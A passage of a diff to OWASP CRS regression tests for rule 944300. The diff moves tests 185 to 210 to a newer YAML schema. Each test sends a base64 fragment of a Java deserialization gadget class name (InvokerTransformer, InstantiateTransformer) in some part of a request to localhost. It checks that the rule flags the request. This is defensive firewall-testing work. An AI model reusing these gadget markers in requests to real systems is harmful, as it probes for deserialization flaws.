"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - 
output: - log_contains: "id \"944300\"" - - test_title: 944300-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - 
test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-194 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - 
test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 205 desc: "XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 206 desc: "Nested XML element value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 207 desc: "Content-Type text/plain includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW52b2tlcnRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW52b2tlcnRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 210 desc: "Argument 
